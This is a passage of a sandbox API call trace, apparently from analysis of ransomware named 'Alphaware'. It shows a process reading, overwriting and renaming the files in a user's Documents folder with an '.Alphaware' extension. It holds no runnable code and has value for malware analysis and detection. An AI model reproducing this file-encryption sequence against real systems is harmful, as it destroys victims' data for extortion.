dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\j8xwaymu3o.xls"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d178af0, ftCreationTime.dwHighDateTime=0x1d96de9, ftLastAccessTime.dwLowDateTime=0xe846b4c0, ftLastAccessTime.dwHighDateTime=0x1d9715f, ftLastWriteTime.dwLowDateTime=0x83c3a200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe134)) returned 1 [0083.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.162] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\j8xwaymu3o.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\j8xwaymu3o.xls.alphaware")) returned 1 [0083.163] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt", dwFileAttributes=0x80) returned 1 [0083.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\no5ewli.ppt"), fInfoLevelId=0x0, lpFileInformation=0x257cb10 | out: lpFileInformation=0x257cb10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe63a6c10, ftCreationTime.dwHighDateTime=0x1d97567, ftLastAccessTime.dwLowDateTime=0x767660b0, ftLastAccessTime.dwHighDateTime=0x1d97624, ftLastWriteTime.dwLowDateTime=0x767660b0, ftLastWriteTime.dwHighDateTime=0x1d97624, nFileSizeHigh=0x0, nFileSizeLow=0xd30a)) returned 1 [0083.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.163] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\no5ewli.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.163] ReadFile (in: hFile=0x254, lpBuffer=0x257cd38, nNumberOfBytesToRead=0xd30a, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x257cd38*, lpNumberOfBytesRead=0x23eb38*=0xd30a, lpOverlapped=0x0) returned 1 [0083.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.199] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\no5ewli.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.204] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\no5ewli.ppt"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe63a6c10, ftCreationTime.dwHighDateTime=0x1d97567, ftLastAccessTime.dwLowDateTime=0x767660b0, ftLastAccessTime.dwHighDateTime=0x1d97624, ftLastWriteTime.dwLowDateTime=0x83cac620, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11a34)) returned 1 [0083.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.204] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\no5ewli.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\No5ewLi.ppt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\no5ewli.ppt.alphaware")) returned 1 [0083.205] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx", dwFileAttributes=0x80) returned 1 [0083.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\o4vmeo_pmk30fk6.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x243c840 | out: lpFileInformation=0x243c840*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcd3dc580, ftCreationTime.dwHighDateTime=0x1d960cd, ftLastAccessTime.dwLowDateTime=0xe96d0280, ftLastAccessTime.dwHighDateTime=0x1d96d10, ftLastWriteTime.dwLowDateTime=0xe96d0280, ftLastWriteTime.dwHighDateTime=0x1d96d10, nFileSizeHigh=0x0, nFileSizeLow=0x2931)) returned 1 [0083.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.205] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\o4vmeo_pmk30fk6.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.206] ReadFile (in: hFile=0x254, lpBuffer=0x243cab8, nNumberOfBytesToRead=0x2931, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x243cab8*, lpNumberOfBytesRead=0x23eb38*=0x2931, lpOverlapped=0x0) returned 1 [0083.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.275] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\o4vmeo_pmk30fk6.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\o4vmeo_pmk30fk6.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3dc580, ftCreationTime.dwHighDateTime=0x1d960cd, ftLastAccessTime.dwLowDateTime=0xe96d0280, ftLastAccessTime.dwHighDateTime=0x1d96d10, ftLastWriteTime.dwLowDateTime=0x83d6ad00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x37c8)) returned 1 [0083.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.278] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\o4vmeo_pmk30fk6.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\O4VMeO_PmK30fk6.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\o4vmeo_pmk30fk6.xlsx.alphaware")) returned 1 [0083.279] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp", dwFileAttributes=0x80) returned 1 [0083.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.279] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\ozdqhhdycahwn.odp"), fInfoLevelId=0x0, lpFileInformation=0x24d9958 | out: lpFileInformation=0x24d9958*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd77e2530, ftCreationTime.dwHighDateTime=0x1d96b04, ftLastAccessTime.dwLowDateTime=0xb70f9980, ftLastAccessTime.dwHighDateTime=0x1d970d8, ftLastWriteTime.dwLowDateTime=0xb70f9980, ftLastWriteTime.dwHighDateTime=0x1d970d8, nFileSizeHigh=0x0, nFileSizeLow=0x16a12)) returned 1 [0083.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.280] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\ozdqhhdycahwn.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.280] ReadFile (in: hFile=0x254, lpBuffer=0x128917a8, nNumberOfBytesToRead=0x16a12, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x128917a8*, lpNumberOfBytesRead=0x23eb38*=0x16a12, lpOverlapped=0x0) returned 1 [0083.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.374] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\ozdqhhdycahwn.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.379] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\ozdqhhdycahwn.odp"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd77e2530, ftCreationTime.dwHighDateTime=0x1d96b04, ftLastAccessTime.dwLowDateTime=0xb70f9980, ftLastAccessTime.dwHighDateTime=0x1d970d8, ftLastWriteTime.dwLowDateTime=0x83e4f540, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e3a0)) returned 1 [0083.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.379] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\ozdqhhdycahwn.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\ozdQhhdYCAhwn.odp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\ozdqhhdycahwn.odp.alphaware")) returned 1 [0083.380] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx", dwFileAttributes=0x80) returned 1 [0083.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.381] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ppcdrq5.docx"), fInfoLevelId=0x0, lpFileInformation=0x2556f60 | out: lpFileInformation=0x2556f60*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xeacec3e0, ftCreationTime.dwHighDateTime=0x1d91354, ftLastAccessTime.dwLowDateTime=0xc01a6a90, ftLastAccessTime.dwHighDateTime=0x1d969a4, ftLastWriteTime.dwLowDateTime=0xc01a6a90, ftLastWriteTime.dwHighDateTime=0x1d969a4, nFileSizeHigh=0x0, nFileSizeLow=0x17614)) returned 1 [0083.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.381] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ppcdrq5.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.381] ReadFile (in: hFile=0x254, lpBuffer=0x129d0640, nNumberOfBytesToRead=0x17614, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x129d0640*, lpNumberOfBytesRead=0x23eb38*=0x17614, lpOverlapped=0x0) returned 1 [0083.421] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx", lpFilePart=0x0) returned 0x29 [0083.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.421] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ppcdrq5.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.423] GetFileType (hFile=0x254) returned 0x1 [0083.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.423] GetFileType (hFile=0x254) returned 0x1 [0083.423] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.424] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.425] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.425] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.425] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.426] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.426] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.426] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.426] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.427] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.427] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.427] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.428] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.428] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.428] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.429] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.429] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.429] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.429] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.433] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.433] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.434] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.434] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.434] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.435] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.435] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.435] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.435] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.436] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.436] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.436] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea18, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23ea18*=0x1000, lpOverlapped=0x0) returned 1 [0083.437] WriteFile (in: hFile=0x254, lpBuffer=0x23ebff8*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ebff8*, lpNumberOfBytesWritten=0x23e9f8*=0x3a0, lpOverlapped=0x0) returned 1 [0083.437] CloseHandle (hObject=0x254) returned 1 [0083.440] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx", lpFilePart=0x0) returned 0x29 [0083.440] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx.Alphaware", lpFilePart=0x0) returned 0x33 [0083.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ppcdrq5.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec3e0, ftCreationTime.dwHighDateTime=0x1d91354, ftLastAccessTime.dwLowDateTime=0xc01a6a90, ftLastAccessTime.dwHighDateTime=0x1d969a4, ftLastWriteTime.dwLowDateTime=0x83ee7ac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f3a0)) returned 1 [0083.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.440] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ppcdrq5.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\PPCDrQ5.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\ppcdrq5.docx.alphaware")) returned 1 [0083.442] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf", dwFileAttributes=0x80) returned 1 [0083.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\qq69aqvcd-_ggmfehfcj.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23ed718 | out: lpFileInformation=0x23ed718*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd5589620, ftCreationTime.dwHighDateTime=0x1d97354, ftLastAccessTime.dwLowDateTime=0x78654fb0, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x78654fb0, ftLastWriteTime.dwHighDateTime=0x1d97635, nFileSizeHigh=0x0, nFileSizeLow=0x15276)) returned 1 [0083.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.442] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf", lpFilePart=0x0) returned 0x35 [0083.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.443] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\qq69aqvcd-_ggmfehfcj.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.443] GetFileType (hFile=0x254) returned 0x1 [0083.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.443] GetFileType (hFile=0x254) returned 0x1 [0083.443] GetFileSize (in: hFile=0x254, 